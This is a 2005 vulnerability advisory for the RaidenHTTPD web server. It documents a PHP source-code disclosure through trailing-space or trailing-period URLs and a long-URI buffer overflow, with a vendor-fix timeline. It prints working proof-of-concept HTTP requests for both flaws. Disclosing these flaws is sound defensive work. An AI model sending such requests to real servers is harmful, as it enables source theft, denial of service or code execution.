 |
|
|
by Tan Chew Keong
Release Date: 01 Mar 2005
RaidenHTTPD Server
is a full featured web server software for Windows 98 / Me / 2000 / XP / 2003 platforms.
It is easy to use and install, and is designed for anyone who wants to have a website running within minutes.
A CGI source code disclosure vulnerability was found in RaidenHTTPD that may be exploited to obtain the
source code of any PHP scripts on the server. A buffer overflow vulnerability was also found that may be
remotely exploited to cause DoS and allows arbitrary code execution.
RaidenHTTPD Server Version 1.1.32 (Shareware) on English Win2K SP4.
This advisory documents two vulnerabilities found in RaidenHTTPD server. The first vulnerability may be remotely exploited
to obtain the source code of any PHP scripts on the server. The second is a buffer overflow vulnerability that may be
remotely exploited to cause DoS or to execute arbitrary code on the server.
1. CGI source code disclosure vulnerabliity.
RaidenHTTPD supports the use of CGI scripts using PHP or PERL. The default installation comes with PHP installed. Using
a specially crafted URL, it is possible to obtain the source code of any PHP scripts on the server. The problem is that
under Windows, the following two filenames, "test.php." (with a period at the end) and "test.php "
(with space characters at the end), can both be used to open the file "test.php". The application fails to check for
this condition and serves "test.php" out as text file, since the two crafted filename does not end with the extension of a
CGI script. (i.e. ".php").
This vulnerability is shown below.
GET /test.php%20 HTTP/1.1
host: localhost
connection: close
HTTP/1.1 200 OK
Server: RaidenHTTPD/1.1.32 (Shareware)
Content-Type: application/octet_stream
Connection: close
Content-Length: 25
<?php
phpInfo();
?>
GET /test.php. HTTP/1.1
host: localhost
connection: close
HTTP/1.1 200 OK
Server: RaidenHTTPD/1.1.32 (Shareware)
Content-Type: application/octet_stream
Connection: close
Content-Length: 25
<?php
phpInfo();
?>
2. Buffer overflow when processing HTTP requests with long URI.
A buffer overflow condition occurs when RaidenHTTPD receives an URI with more than 524 characters in the URI. The following
is a HTTP request that would trigger the overflow. The characters 1234 highlighted in
red below will overwrite an entry in a string pointer table. This will generate a read exception when the application tries
to read data using 1234 as an address. This exception will occur 3 times before
EIP gets overwritten with the characters wwww.
It was observed that the read exception and overflow does not occur immediately. There will be a short delay before
EIP gets overwritten. Exploitation is complicated by the fact that not all characters are allowed in the URI.
This limits the return addresses that can be used. In addition, none of the register points to the shellcode when EIP
gets overwritten, further complicating the exploit.
POST /TESTAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZ1
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZ2
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZ3
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT1234VVVVWWWWXXXXYYYYZZZ4
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYwwww HTTP/1.1
host: localhost
connection: close
- Vendor has released version 1.1.34 that fixes these vulnerabilities.
20 Feb 05 - Vulnerability Discovered.
22 Feb 05 - Initial Vendor Notification.
22 Feb 05 - Initial Vendor Reply.
22 Feb 05 - Received notification from vendor that fixed version 1.1.34 is released.
01 Mar 05 - Public Release
For further questions and enquries, email them to the following.
Overall-in-charge: Tan Chew Keong
webmaster@security.org.sg
|
 |
